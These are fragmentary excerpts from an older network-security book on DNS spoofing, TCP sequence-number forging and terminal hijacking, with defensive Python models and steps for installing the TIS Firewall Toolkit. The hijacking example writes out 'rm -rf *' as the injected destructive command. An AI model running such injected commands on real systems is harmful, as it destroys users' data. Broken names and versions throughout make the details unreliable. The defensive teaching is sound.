Suppose a name server somewhere on the Internet has been compromised by a security attack or is being controlled by an intruder ... The authoritative responses can direct clients looking up the names of servers to connect to servers under the control of the attacker rather than the legitimate servers ... Within the DNS system, absolutely nothing can be done about such a direct attack ... That is, a server queries the DNS system with the IP address of a prospective client via a reverse lookup and receives the DNS name(s) of the prospective client ... Cross-checking has become a standard technique with TCP wrapper systems ... Because these tables are kept in separate files, they may also be kept on separate name servers ... Because of potential abuses of the efficiency mechanisms in DNS, the name server may not discover the inconsistency ... In particular, when a name server makes a non-authoritative response to an iterative query, it responds with the name of a name server more likely to be authoritative than itself ... In such cases, a check on authoritativeness should, in principle, detect the attack ... One must then ask the name server at that address for the address of the name server that is authoritative for the next component of the DNS name and so on ... Also, it does not help if an authoritative name server has become compromised; it only detects invalid claims to authority ... The DNS standards require that data for each domain be replicated on separate computers with no common point of failure, meaning that the name servers with the duplicated data must not be attached to the same network or obtain electrical power from a common source ...

For this reason, it might seem that you could poll all authoritative name servers when making a query to look for a discrepancy ... The secondary name servers simply make a copy of the data in the primary on a periodic basis after the serial number on the data for a domain has changed ... Meanwhile, inconsistencies may simply indicate that the secondary has not copied legitimate changes to the data on the primary ...

For example, suppose one query places the name of a domain and the name of its name server in the cache as well as the name of the name server and its address ...

If either of these cached records is invalid, all subsequent queries for this domain will be directed to the wrong place ... A compromised name server may cause errors in the caches of uncompromised name servers that cause the uncompromised name server to provide invalid data to its clients ... Thus, it may provide a perfectly valid response to the original query, but arbitrary misinformation provided in the additional information section of the response will be cached by a name server that queries it ... A compromised name server might provide an invalid response, which would seem to make the prospective client legitimate ... If the server makes an iterative query instead, it will not cause immediate corruption of its name server’s cache when the compromised name server is not directly interacting with the local name server, but any client of the local name server may trigger a request that corrupts the cache of the local name server ...
Their company runs a name server to support their DNS domain, widget ... Their workstations consult this name server when looking up the IP addresses of outside networks ... edu domain ... com name server that forwards the query to the podunk ... The widget ... edu and supplies the requested IP address information to Mary’s Web browser ... edu name server has been taken over by a malicious college student ... com name server, additional information fields are attached ... sf ... us,” the DNS name for the Well—an online service provider located in San Francisco ...

A little while later, Frank decides to telnet to his account on well ... ca ... When he types in his username and password, there is a brief pause, he is presented with his usual menus, and continues his work ... com name server ... com name server found the entry for well ... ca ... Frank’s machine established a connection with the college student’s machine and it began the classic Trojan horse routine ...

It then turned around and used a modified version of telnet to connect to well ... ca ... The Trojan horse created the illusion that Frank was directly connected to the Well and gave the college student the password for Frank’s account on the Well ... Now examine an active attack exploiting this same weakness, and with an attacker who targets a specific individual ...

Suppose Frank has set up his account at Widgets, Inc ... sf ... us) without being required to supply a password ...

The malicious college student sends a mail message to a mail server at Widgets, Inc ... The mail server performs a DNS lookup for podunk ...

The compromised name server supplies additional information in its reply that indicates not only that well ... ca ... sf ... us ...

His machine starts up the rlogin daemon ... com name server, looking for the name that corresponds to the IP address of the college student’s machine ... com name server finds this information in its cache and replies that the IP address corresponds to the name “well ... ca ... ” The college student gains access to Frank’s account at Widgets, Inc ... The logs on the Well show that Frank was not logged in, however, which would tip Frank off if he ever cross-checked them with his own logs ... Do not use rlogin to allow access from machines that do not have authoritative entries in the local name server database ... A DNS spoof will subvert this check ... However, DNS style naming is such a part of the way users and system administrators work that it is unthinkable to do without it ... Every place an IP address is used in place of a DNS name is one less place the system is vulnerable to DNS spoofing ... The API is the same whether DNS is being used to implement these mappings or some other standard ... The DNS is consulted by these implementations of the API only if the local sources fail to give conclusive results ... In particular, many modern operating systems use dynamic linking or shared libraries to reduce the size of executable files ...

Note: When using SunOS 4 ... When I wanted my programs to use the DNS system instead, I had to get source code to implement those functions using the DNS, compile it, and include it in the shared C system library ...

If a client on one machine triggers the corruption of the cache on one name server, the use of multiple name servers reduces the likelihood of widespread damage ...

Other hosts can use a different name server that will not have its cache corrupted as long as the name server on the timeshared host does not forward recursive requests to the other name server ... The technique outlined here limits damage from a passive attacker waiting for victims to come along ... Placing such a limitation on a name server does not make it useful for serving requests to the outside world but makes it more secure for internal use ... In the first case study, Mary’s cache would have been corrupted but it would not have caused problems for Frank ...


The use of local name servers on workstations also may reduce total network traffic and aid in fault tolerance ...

Warning: You are still at risk of a DNS spoof if local name servers on workstations are configured to process queries recursively when they consult the network wide name server ... In either case, a corrupted network-wide name server cache will affect the workstations ... Local name servers are also subject to cache corruption ... You should be sure local name servers only process queries from the local machine to prevent an active attacker from directly contaminating their cache ...

You might also modify local name server software to be more selective about the information it caches ... Selective caching by doing such things as ignoring information in the additional information section of DNS replies will certainly have an adverse impact on efficiency ...
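Both the forward/reverse cross-check described earlier in this section and the selective caching suggested just above can be shown in one small model, added here as an example (it is not code from the book or from BIND). It represents a DNS reply by its four sections rather than in wire format, applies a “bailiwick” rule that caches additional-section records only when their owner names fall inside the zone the answering server was asked about, and then runs the TCP-wrapper style cross-check on a client address. The names, the addresses (from the 192.0.2.0/24 documentation range) and the poisoned reply are all constructed to mirror the Frank and Mary case study.

```python
"""Selective caching of DNS replies plus a forward/reverse cross-check.

Added example, not code from the book or from BIND. The reply is modelled
by its sections, not in wire format; names, addresses and TTLs are
constructed to mirror the case study in the text.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple


@dataclass(frozen=True)
class Record:
    name: str      # owner name, e.g. "www.podunk.edu"
    rtype: str     # "A", "PTR", "NS", ...
    rdata: str     # an address, or a name for PTR and NS records
    ttl: int = 3600


@dataclass
class Reply:
    """The four sections of a DNS reply: question, answer, authority, additional."""
    question: Tuple[str, str]
    answer: List[Record] = field(default_factory=list)
    authority: List[Record] = field(default_factory=list)
    additional: List[Record] = field(default_factory=list)


def in_bailiwick(owner: str, zone: str) -> bool:
    """True if `owner` is `zone` itself or a name below it (case-insensitive)."""
    owner, zone = owner.lower().rstrip("."), zone.lower().rstrip(".")
    return owner == zone or owner.endswith("." + zone)


class Cache:
    def __init__(self, selective: bool) -> None:
        self.selective = selective   # apply the bailiwick rule to the additional section
        self.records: Set[Record] = set()
        self.dropped: List[Record] = []

    def absorb(self, reply: Reply, zone: str) -> None:
        """Cache a reply obtained from the name server responsible for `zone`."""
        for rec in reply.answer + reply.authority:
            self.records.add(rec)
        for rec in reply.additional:
            if self.selective and not in_bailiwick(rec.name, zone):
                self.dropped.append(rec)   # unsolicited data about some other zone: ignore it
            else:
                self.records.add(rec)

    def lookup(self, name: str, rtype: str) -> List[str]:
        return sorted(r.rdata for r in self.records
                      if r.name.lower() == name.lower() and r.rtype == rtype)


def reverse_name(ip: str) -> str:
    """Owner name used for a PTR (reverse lookup) query on an IPv4 address."""
    return ".".join(reversed(ip.split("."))) + ".in-addr.arpa"


def cross_check(cache: Cache, client_ip: str) -> Optional[str]:
    """TCP-wrapper style check: reverse lookup, then confirm the name maps back.

    Returns the verified host name, or None if no name checks out.
    """
    for name in cache.lookup(reverse_name(client_ip), "PTR"):
        if client_ip in cache.lookup(name, "A"):
            return name
    return None


# Constructed scenario: the compromised podunk.edu server answers a harmless
# query but plants forward and reverse records for well.sf.ca.us that point
# at the college student's machine.
STUDENT_IP = "192.0.2.77"

POISONED_REPLY = Reply(
    question=("www.podunk.edu", "A"),
    answer=[Record("www.podunk.edu", "A", "192.0.2.10")],
    authority=[Record("podunk.edu", "NS", "ns.podunk.edu")],
    additional=[
        Record("ns.podunk.edu", "A", "192.0.2.53"),                # legitimate glue record
        Record("well.sf.ca.us", "A", STUDENT_IP),                  # planted
        Record(reverse_name(STUDENT_IP), "PTR", "well.sf.ca.us"),  # planted
    ],
)


def run(selective: bool) -> Optional[str]:
    """Feed the poisoned reply to a cache, then ask which host 192.0.2.77 is."""
    cache = Cache(selective)
    cache.absorb(POISONED_REPLY, zone="podunk.edu")
    return cross_check(cache, STUDENT_IP)


if __name__ == "__main__":
    print("naive cache:    ", run(selective=False))   # well.sf.ca.us (spoofed)
    print("selective cache:", run(selective=True))    # None
```

With the naive cache the cross-check passes, which is the point the case study makes: both halves of the check were fed by the same poisoned reply. With the bailiwick rule the planted records never enter the cache, so the reverse lookup returns nothing and rlogin-style name-based access is refused.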

RFC 1788 proposes an alternative to DNS reverse lookups: all machines would respond to a new ICMP message requesting the set of names that correspond to the IP address on which the ICMP message was received ... Although this proposal aims to increase the security of DNS, it is not clear how it would have helped in the case study involving Frank and Mary described earlier ...

The simplest thing a name server administrator can do to prevent a DNS spoof from corrupting the name server cache is to have the most recent version of the operating system’s DNS name server software ... Newer versions of BIND incorporate modifications made with a more security conscious attitude than older versions ... dns ... dnsrd/servers ...

Tip: For a more detailed treatment of the security weaknesses of the DNS system, see the paper “Countering Abuses of Name-based Authentication” by Christoph Schuba and Eugene Spafford of the COAST security lab at Purdue University ...

COAST has a site on the World Wide Web at http://www ... purdue ... html ...

It is possible for an attacker’s machine to spoof by sending IP datagrams that have an IP source address belonging to another machine ...

The attacker’s machine can send IP datagrams with a forged source address to other machines while the machine legitimately possessing that IP address is active ... The other machines will accept these datagrams as coming from the legitimate holder of the IP source address of these forged datagrams ...

Typically, IP-based application protocols have some notion of a session with some information exchanged at startup, which is used to identify the two parties to each other during the active part of the session ... If a sniffer is being used by the attacker, it becomes easy for the attacker to pose as either party ... After this exchange, the client will be able to open and read or write files on the server by making requests of the NFS daemon ... If the attacker sends out an appropriately formatted UDP datagram, the server will process an NFS request and send the results back to the client ... If the request was a read request and the attacker has a sniffer between the client and server, the attacker will succeed in finding out some of the contents of the disk via the sniffer ... In the NFS scenario described earlier, you were using UDP and assumed the attacker had a sniffer to obtain the credentials that allowed acceptance of the request as valid ... If you can rule out an attacker having a sniffer between the client and the server, the attacker would be unable to obtain the needed credentials ...



Introduction to TCP/IP End-to-End Handshaking
To understand how an attacker might be able to send datagrams accepted as valid, you need to understand the information exchanged between the parties of a TCP connection ... Initially, one party is passively waiting for the establishment of a connection ... The passive party is typically a server ... The active party is typically a client ... This discussion refers to the parties as client and server merely to be more suggestive of the typical roles they will play later ... SYN stands for “synchronize” and refers to the synchronization of initial sequence numbers ... Every TCP header contains a sequence number field corresponding to the sequence number in the first data byte of the field ...

Rand‍omness of initial sequence number is important for handling the situation when a connection is established, the machine on one side crashes, and then attempts to reestablish a connection ... TCP only sets the SYN flag when the connection is started ... ACK stands for “acknowledgment ... The ACK flag lets the client know that it received the initial sequence number ...

To complete the connection, the client responds back to the server with a TCP header that has the ACK flag set ... Understanding the sequence of events with SYN and ACK flags during the establishment of a connection is also important when configuring firewalls (see Chapter 7, “How to Build a Firewall,” for more information) ... The other party will occasionally send back a TCP/IP datagram with the TCP header having the ACK flag set to let the sender know that the data arrived ... TCP transmits the amount of available room in the window field of the TCP header in each datagram sent to inform the sender how much more data may be sent before the receive buffer fills ... The acknowledgment number specifies the lowest sequence number of a data byte that it expects to receive ...

Occasionally, IP datagrams will arrive out of order ... When the expected datagram arrives, the receiver may acknowledge both sets of TCP data at once ...


Forged TCP/IP Datagrams
To successfully forge a TCP/IP datagram that will be accepted as part of an existing connection, an attacker only needs to estimate the sequence number to be assigned to the next data byte to be sent by the legitimate sender ...

If the attacker knows or successfully guesses the exact value of the next sequence number of the next byte being sent, the attacker can forge a TCP/IP datagram containing data that will be placed in the receiver’s input buffer in the next available position ... However, if the forged datagram contains more data, the receiver will discard only the first part ...

On the other hand, if the forged datagram arrives before the legitimate datagram, the legitimate datagram will be discarded by the receiver (at least partially) ... However, if the forged datagram contains enough data, the receiver may place the last part of the forged data in its input buffer ... Some of the data bytes at the end of the forged datagram may have sequence numbers that do not fit in the current window, so the receiver will discard these ... Then, the whole forged datagram is available to the receiving program ...
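The handshake and the receiver’s acceptance rules described in the last two sections, as an added example (not code from the book): a minimal model of one TCP receiver that performs the SYN, SYN-ACK, ACK exchange and then trims each arriving data segment against the next expected sequence number and the receive window. Nothing in the acceptance step looks at the IP source address, which is the property the text relies on. Initial sequence numbers, the window size and the payloads are constructed; 32-bit sequence wraparound and out-of-order queuing are left out.

```python
"""Three-way handshake and in-window data acceptance of a TCP receiver.

Added example, not code from the book. Initial sequence numbers, the
window size and the payloads are constructed; sequence-number wraparound
and out-of-order queuing are deliberately left out.
"""
import secrets
from dataclasses import dataclass, field
from typing import Tuple

SEQ_MOD = 1 << 32


def random_isn() -> int:
    """An initial sequence number from a CSPRNG (the 'completely random' case)."""
    return secrets.randbelow(SEQ_MOD)


@dataclass
class Segment:
    seq: int                 # sequence number of the first data byte
    ack: int = 0             # next sequence number the sender expects to receive
    syn: bool = False
    ack_flag: bool = False
    data: bytes = b""


@dataclass
class Receiver:
    """Receive side of one connection once the handshake has completed."""
    rcv_nxt: int                                      # next sequence number expected
    window: int                                       # bytes we are willing to buffer
    buffer: bytearray = field(default_factory=bytearray)

    def accept(self, seg: Segment) -> Tuple[int, int, int]:
        """Process one data segment.

        Returns (duplicate, buffered, beyond_window) byte counts. Nothing
        here looks at who sent the segment: a datagram carrying the right
        sequence number is accepted whatever its IP source address.
        """
        n = len(seg.data)
        if seg.seq > self.rcv_nxt:
            # Gap before this segment; a real stack would queue it for later.
            return (0, 0, n)
        duplicate = min(self.rcv_nxt - seg.seq, n)     # bytes we already hold
        seg_end = seg.seq + n
        win_end = self.rcv_nxt + self.window
        beyond = max(0, min(seg_end - win_end, n))     # bytes that do not fit the window
        usable = seg.data[duplicate:n - beyond]
        self.buffer.extend(usable)
        self.rcv_nxt += len(usable)
        return (duplicate, len(usable), beyond)


def handshake(client_isn: int, server_isn: int) -> Tuple[Segment, Segment, Segment, Receiver]:
    """Return the three handshake segments and the server's receiver state."""
    syn = Segment(seq=client_isn, syn=True)                                         # client -> server
    syn_ack = Segment(seq=server_isn, ack=client_isn + 1, syn=True, ack_flag=True)  # server -> client
    ack = Segment(seq=client_isn + 1, ack=server_isn + 1, ack_flag=True)            # client -> server
    # The SYN occupies one sequence number, so the server now expects client_isn + 1.
    return syn, syn_ack, ack, Receiver(rcv_nxt=syn_ack.ack, window=8)


def demo() -> Tuple[bytes, Tuple[int, int, int], Tuple[int, int, int], Tuple[int, int, int]]:
    """Feed three constructed segments to the server side and report what happened."""
    _, _, _, rx = handshake(client_isn=1000, server_isn=5000)
    r1 = rx.accept(Segment(seq=1001, data=b"ls\r\n"))                # in order: all 4 bytes kept
    r2 = rx.accept(Segment(seq=1003, data=b"\r\npwd\r\n"))           # overlaps 2 bytes: trimmed
    r3 = rx.accept(Segment(seq=1010, data=b"whoami\r\nuptime\r\n"))  # 16 bytes, window 8: tail dropped
    return bytes(rx.buffer), r1, r2, r3
```

The second and third segments reproduce the two cases in the text: data that overlaps bytes already received loses its first part, and data that runs past the window loses its tail. In both cases the receiver keeps whatever fits and the receiving program sees it as ordinary input.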
An attacker could possibly be controlling more than one machine along this path so the machine doing the sniffing need not be the machine doing the forging ... The only possible place to stop the forged datagram would be at the router on the forger’s network, where a discrepancy might be detected between the hardware address of the legitimate sender and the forger ... If the forging occurs on neither of the two endpoint networks, then the opportunity to stop the forged datagram decreases ... You can protect your network from being the source of a forging attack by configuring these routers not to forward datagrams with impossible IP network addresses ... If both endpoints are on the same physical network, an attacker might be bold enough to forge a datagram from another physical network ... However, the router would have the opportunity to detect the forged datagram by noting that the IP source network address matches the IP destination network address ...

Note: See the files for CERT Advisory CA:95-01 to find out more about actual attacks based on this special case ...
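The router check recommended above, written out as an added example (not code from the book or from any router vendor): a border router that knows which networks lie behind each of its interfaces, with a default route on the outside interface, refuses to forward a datagram whose source address could not legitimately have arrived on that interface, and separately refuses one whose source and destination lie in the same directly known network, the special case the CERT advisory concerns. Interface names and the address ranges are constructed.

```python
"""Anti-spoofing source-address check at a router.

Added example, not code from the book or from any router. Interface
names and the address ranges behind them are constructed.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

IPv4Network = ipaddress.IPv4Network


@dataclass
class Datagram:
    src: str
    dst: str
    arrived_on: str   # name of the interface the datagram came in on


class Router:
    def __init__(self, interfaces: Dict[str, List[str]]) -> None:
        # interface name -> networks reachable through it; "0.0.0.0/0" on the
        # outside interface stands for "everything not known to be inside".
        self.ifaces: Dict[str, List[IPv4Network]] = {
            name: [ipaddress.IPv4Network(n) for n in nets] for name, nets in interfaces.items()
        }

    def best_match(self, addr: str) -> Optional[Tuple[str, IPv4Network]]:
        """Longest-prefix match: the (interface, network) that `addr` belongs to."""
        ip = ipaddress.IPv4Address(addr)
        best: Optional[Tuple[str, IPv4Network]] = None
        for name, nets in self.ifaces.items():
            for net in nets:
                if ip in net and (best is None or net.prefixlen > best[1].prefixlen):
                    best = (name, net)
        return best

    def check(self, dg: Datagram) -> Tuple[bool, str]:
        """Decide whether to forward `dg`; returns (forward, reason)."""
        if dg.arrived_on not in self.ifaces:
            raise ValueError(f"unknown interface {dg.arrived_on}")
        src = self.best_match(dg.src)
        dst = self.best_match(dg.dst)
        if src is None:
            return False, "source address matches no known network"
        if dst is not None and src[1] == dst[1] and src[1].prefixlen > 0:
            # Both ends on one network: such a datagram never needs a router.
            return False, f"source and destination both in {src[1]}"
        if src[0] != dg.arrived_on:
            return False, f"source {dg.src} belongs behind {src[0]} but arrived on {dg.arrived_on}"
        return True, "ok"


# Constructed router: two campus networks inside, the Internet outside.
BORDER = Router({"inside": ["10.1.0.0/16", "10.2.0.0/16"], "outside": ["0.0.0.0/0"]})

SAMPLE = [
    Datagram("198.51.100.5", "10.1.2.3", "outside"),    # ordinary inbound traffic
    Datagram("10.1.2.3", "198.51.100.5", "inside"),     # ordinary outbound traffic
    Datagram("10.1.9.9", "10.1.2.3", "outside"),        # source and destination on the same net
    Datagram("10.2.9.9", "10.1.2.3", "outside"),        # inside address arriving from outside
    Datagram("203.0.113.7", "198.51.100.5", "inside"),  # outside address leaving from inside
]


def filter_all(router: Router, datagrams: List[Datagram]) -> List[bool]:
    """Forwarding decision for each datagram, in order."""
    return [router.check(dg)[0] for dg in datagrams]


if __name__ == "__main__":
    for dg, ok in zip(SAMPLE, filter_all(BORDER, SAMPLE)):
        print("forward" if ok else "drop   ", dg.src, "->", dg.dst, "via", dg.arrived_on)
```

The last sample datagram is the egress case the text asks you to configure: it keeps your own network from being the source of a forging attack, which is the one place such a datagram can still be recognised as impossible.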
However, this assumes assignment of the initial sequence numbers in a completely random manner ... If the initial sequence numbers of the two connections are related in some way, the attacker will be able to compute the initial sequence number of the other connection ... This estimate added to the initial sequence number estimates the current sequence number ...

Some TCP/IP implementations use initial sequence numbers generated by a simple random number generator that generates numbers in a fixed order ...

Knowing that connection’s initial sequence number will provide enough information to narrow the plausible initial sequence numbers for the connection to a very few instead of four billion ...


Terminal Hijacking: An Example of TCP/IP Forging
Imagine the following everyday scenario at my workplace ... The most convenient way to use these systems is to have them start automatically ...

In fact, some of these sessions never are used after they start ... An attacker with ordinary access to one of the timesharing systems can easily detect the time any particular worker starts a terminal session by monitoring the set of users on the timeshared system ...

The attacker may have received this number using a sniffer running on another host on the network or by taking advantage of the deterministic pattern of initial sequence numbers ... Typically, the worker types in at most a username, password, and a command or two by this time ...

To do some real damage, the attacker simply has to insert a sequence of characters in the data stream that correspond to a command being typed in at the command prompt ... Putting “rm -rf *” on the command line in Unix deletes all files in the current directory along with all files in all subdirectories of the current directory ...

If the attacker determines the exact initial sequence number for the terminal session, the command is executed by the timesharing system in the worker’s absence ... Imagine the surprise the worker gets when he or she shows up in the morning and sees this terminal window ...


Reducing the Risks of TCP/IP Spoofing
One way to reduce the threat of this sort of attack is to simply log out of all terminal sessions before they become inactive and only start up terminal sessions when you need them ...

A second way to reduce the threat is to use an implementation of the terminal session protocol (telnet or rlogin) that inserts extra terminal protocol data transmitted to the timesharing machine ...

A third way to reduce the threat is to avoid the use of terminal session protocols between the user’s desktop and the timesharing machine ...

You can also run the windowing program on the timesharing machine and use the X protocol to have the window displayed on your desktop ...

A fourth way to reduce the threat of TCP/IP spoofing is to use an encryption-based terminal protocol ... If the attacker is using a sniffer, the sniffer knows the exact current sequence number ... Unless the encryption is broken, the receiver will accept the data as valid but the command interpreter will not be able to make sense of it ...

The only way to deal with this threat completely with current standardized technology is to use a combination approach ... TCP/IP data must be encrypted so that unencrypted or misencrypted data will not be confused with valid commands ...


Using Next-Generation Standard IP Encryption Technology
To stop IP address spoofing, you must use encryption on the entire data portion of an IP datagram, including the TCP header ... See RFCs 1825-1830 ... It encrypts the TCP header and the TCP data, preventing sniffers from finding sequence numbers ... Because it requires kernel modification, the source code is not of general interest; if you are interested, however, use anonymous FTP to access ftp ... berkeley ...

An emerging standardized IP encryption technique is specified in “RFC 1825: Security Architecture for the Internet Protocol ... RFC 1825 specifies two parts: an authentication header (AH) and an encapsulating security payload ... The use of the authentication header prevents the forging of IP datagrams ...

The following RFCs detail a proposed standard authored by R ... They were authored by Metzger, Karn, and Simpson and published in August 1995 ... The newer RFCs are, as of this writing, still “experimental” rather than part of a “proposed standard ...
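The property the authentication header provides, shown as an added example (it is not code from the book, and it is not the RFC 1825 wire format): sender and receiver share a secret key; a keyed hash over the immutable IP header fields and the entire payload, TCP header included, travels with the datagram; the receiver recomputes it. A datagram carrying a source address other than the one that was signed, or whose TCP sequence number was altered, fails the check even though a sniffer saw every byte. HMAC-SHA-256 stands in here for the keyed MD5 of RFC 1828; the key, the addresses and the segment are constructed.

```python
"""Keyed-hash integrity protection of an IP datagram, in the spirit of the
RFC 1825 authentication header.

Added example, not code from the book and not the RFC's wire format.
HMAC-SHA-256 stands in for the keyed MD5 of RFC 1828; the key, addresses
and payload are constructed.
"""
import hashlib
import hmac
import ipaddress
import struct
from dataclasses import dataclass, replace
from typing import Tuple


@dataclass(frozen=True)
class Datagram:
    src: str
    dst: str
    protocol: int     # IP protocol number, 6 = TCP
    payload: bytes    # transport header plus data, e.g. a whole TCP segment
    tag: bytes = b""  # authentication data carried with the datagram


def authenticated_bytes(dg: Datagram) -> bytes:
    """The fields covered by the keyed hash.

    As AH does, cover what must not change end to end (addresses, protocol,
    payload) and leave out mutable header fields such as the TTL.
    """
    return (ipaddress.IPv4Address(dg.src).packed
            + ipaddress.IPv4Address(dg.dst).packed
            + struct.pack("!B", dg.protocol)
            + dg.payload)


def protect(key: bytes, dg: Datagram) -> Datagram:
    """Sender side: attach the keyed hash."""
    tag = hmac.new(key, authenticated_bytes(dg), hashlib.sha256).digest()
    return replace(dg, tag=tag)


def verify(key: bytes, dg: Datagram) -> bool:
    """Receiver side: recompute the hash and compare in constant time."""
    expected = hmac.new(key, authenticated_bytes(dg), hashlib.sha256).digest()
    return hmac.compare_digest(expected, dg.tag)


def tcp_segment(sport: int, dport: int, seq: int, ack: int, data: bytes) -> bytes:
    """A simplified TCP header (ports, seq, ack, flags) followed by data."""
    return struct.pack("!HHIIH", sport, dport, seq, ack, 0x18) + data   # flags PSH|ACK


def demo(key: bytes = b"constructed-shared-secret") -> Tuple[bool, bool, bool]:
    """Genuine datagram verifies; a changed source or sequence number does not."""
    genuine = protect(key, Datagram("192.0.2.10", "192.0.2.20", 6,
                                    tcp_segment(40000, 23, 1001, 5001, b"pwd\r\n")))
    # Someone who sniffed the genuine datagram can replay it byte for byte,
    # but any change to a covered field invalidates the tag.
    other_src = replace(genuine, src="192.0.2.30")
    altered_seq = replace(genuine, payload=tcp_segment(40000, 23, 1002, 5001, b"pwd\r\n"))
    return verify(key, genuine), verify(key, other_src), verify(key, altered_seq)
```

The tag does not hide the sequence number, so this alone does not stop a sniffer from learning it; what it removes is the ability to have a fabricated datagram accepted, which is the forging half of the attack described in this section. Hiding the sequence numbers as well is what the encapsulating security payload adds.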
Businesses protect themselves from intellectual theft through patents and trademarks ... Although there are several ways this can be achieved, the most prevalent is the use of a firewall ... The concept applies in a similar fashion to computer technology, except that often we are attempting to protect ourselves from the fire that exists outside our “wall ...

Strictly speaking, a firewall can be defined as a collection of components that is placed between two networks ...

- Only traffic authorized by the local security policy will be allowed to pass ...

This chapter examines the Trusted Information Systems (TIS) Firewall Toolkit, which is provided as a construction set for building a firewall ...


The TIS Firewall Toolkit
The Firewall Toolkit produced by Trusted Information Systems, also known as TIS, is not a single integrated package, but a set of tools that are used to build a firewall ... Consequently, it is difficult to produce documentation that can be used in all situations ... In this chapter, you will examine how to compile the TIS Toolkit, and configure the various components that make up the kit ...


Understanding TIS
The TIS Firewall Toolkit is a collection of applications that, when properly assembled with a security policy, forms the basis of a firewall ... As such, the Toolkit has gained a wide following, and is in use worldwide ... Rather, it is a set of tools for building a number of different types of firewalls ... As such, this chapter explains what the Toolkit is and how the underlying technology works ...

p1vPHCP/nhb1
Internet Security Pro Ref 577-7
tricia 1-24-95
CH07
LP#2
319
How to Build a Firewall


Where to Get TIS Toolkit
The TIS Toolkit is available from the site ftp ... com, in the directory /pub/firewalls/toolkit ... tar ...

After you retrieve the file, it must be uncompressed and extracted from the tar archive ... After uncompressing and extracting the archive, the directory structure illustrated in figure 7 ...

[Figure 7 ... : directory structure of the extracted Toolkit. The fwtk directory holds auth, config, ftp-gw, http-gw, lib, netacl, plug-gw, rlogin-gw, smap, smapd, tn-gw and x-gw; the figure also shows an admin subtree (flog, netscan, portscan, progmail, reporting), a client subtree (gate-ftp, misc) and a server subtree (aix-auth, ftpd, login-sh, login-ts, syslog, reg).]

When the files are extracted from the tar archive, the next task is to compile them ... h and the Makefile ...

Major issues that you need to consider are the installation location of the Toolkit—defaults to /usr/local/etc—and how the library and compiler are to be configured ... The reason for this is this program’s dependencies on the X Window System Athena Widget set ...



Compiling under SunOS 4 ... 3 and 4 ... 4
There should be little difficulty in compiling the TIS Toolkit under the SunOS 4 ... 3 and 4 ... 4 operating systems ... After the archive is extracted, a successful compile can be achieved even without modifying the Toolkit configuration ... 0 from BSD, Inc ...

First, the Makefiles are not in the correct format for the make command ... config

This syntax is not understood by the make command that is shipped with BSD/OS ... The include statement also requires a small change ... include

... However, you can also use the fixmake command to correct the syntax of the Makefile by removing the include statement and including all of the required instructions in one Makefile ... No other changes are necessary ... These issues revolve primarily around the definition of sys_errlist ... For example, sys_errlist is defined in the code as:

extern char *sys_errlist[];

Commenting out the line using the C comment symbols (/* */) results in a successful compile of the source code:

/* extern char *sys_errlist[]; */


Installing the Toolkit
After the compile process completes successfully, you must install the files in the appropriate
place
...
The
process is shown in the following command sequence:
pc# make install
if [ ! -d /usr/local/etc ]; then mkdir /usr/local/etc; fi
for a in config lib auth smap smapd netacl plug-gw ftp-gw tn-gw rlogin-gw http-gw; do ( cd $a; echo install: `pwd`; make install ); done
install: /usr/tis/fwtk/config
if [ ! -f /usr/local/etc/netperm-table ]; then cp netperm-table /usr/local/etc; chmod 644 /usr/local/etc/netperm-table; fi
install: /usr/tis/fwtk/lib
install: /usr/tis/fwtk/auth
if [ -f /usr/local/etc/authsrv ]; then mv /usr/local/etc/authsrv /usr/local/etc/authsrv.old; fi
...
cp authmgr /usr/local/etc
chmod 755 /usr/local/etc/authmgr
if [ -f /usr/local/etc/authload ]; then mv /usr/local/etc/authload /usr/local/etc/authload.old; fi
...
cp authdump /usr/local/etc
chmod 755 /usr/local/etc/authdump
install: /usr/tis/fwtk/smap
if [ -f /usr/local/etc/smap ]; then mv /usr/local/etc/smap /usr/local/etc/smap.old; fi
...
cp smapd /usr/local/etc
chmod 755 /usr/local/etc/smapd
install: /usr/tis/fwtk/netacl
if [ -f /usr/local/etc/netacl ]; then mv /usr/local/etc/netacl /usr/local/etc/netacl.old; fi
...
cp plug-gw /usr/local/etc
chmod 755 /usr/local/etc/plug-gw
install: /usr/tis/fwtk/ftp-gw
if [ -f /usr/local/etc/ftp-gw ]; then mv /usr/local/etc/ftp-gw /usr/local/etc/ftp-gw.old; fi
...
cp tn-gw /usr/local/etc
chmod 755 /usr/local/etc/tn-gw
install: /usr/tis/fwtk/rlogin-gw
if [ -f /usr/local/etc/rlogin-gw ]; then mv /usr/local/etc/rlogin-gw /usr/local/etc/rlogin-gw.old; fi
...
cp http-gw /usr/local/etc
chmod 755 /usr/local/etc/http-gw

With the Toolkit successfully installed and compiled, the next step is the security policy and the configuration of the Toolkit. ... This requires that you have some level of Unix knowledge regarding the system startup procedure and services for your system. ...
  - ... conf file
  - Edit the system startup scripts such as /etc/rc and /etc/rc2 ...
The following output shows such services on a sample system:
pc# ps -aux
USER     PID  VSZ  RSS  TT  STAT STARTED COMMAND
root     442  144  240  p0  R+    3:34AM ps -aux
root       1  124  244  ??  Is    3:02AM /sbin/init -
root       2    0   12  ??  DL    3:02AM (pagedaemon)
root      15  816  888  ??  Is    3:03AM mfs -o rw -s 1 ...
root      36  124  220  ??  Ss    3:03AM
root      40  116  176  ??  Ss    3:03AM
root      77   72   72  ??  Ss    3:03AM
root      79  284  232  ??  Is    3:03AM
root      85   72   36  ??  I     3:03AM
root      86   72   36  ??  I     3:03AM
root      87   72   36  ??  I     3:03AM
root      88   72   36  ??  I     3:03AM
root      91   96  144  ??  Is    3:03AM
root      93  112  180  co  I     3:03AM
root      95  128  192  ??  Is    3:03AM
root      97  104  184  ??  Ss    3:03AM
root     102  332  224  ??  Is    3:03AM
root     108  144  200  ??  Is    3:03AM inetd
root     117  228  300  co  Is+   3:03AM
root     425  156  292  ??  S     3:33AM
chrish   426  280  304  p0  Ss    3:33AM
root     440  220  280  p0  S     3:34AM
root       0    0    0  ??  DLs   3:02AM
pc#
[The %CPU, %MEM and TIME columns, and the COMMAND entries for most of these processes, did not survive extraction; PID 108 is identified as inetd by the kill sequence shown later in this section.]
... conf file so that it resembles the following output, you can reduce the number of active processes. ...

#
# Internet server configuration database
#
# BSDI $Id: inetd ... 1 1995/02/03 05:54:01 polk Exp $
# @(#)inetd ... 2 (Berkeley) 3/18/94
#
#ftp      stream  tcp   nowait  root    /usr/libexec/tcpd       ftpd -l -A
#telnet   stream  tcp   nowait  root    /usr/libexec/tcpd       telnetd
#shell    stream  tcp   nowait  root    /usr/libexec/tcpd       rshd
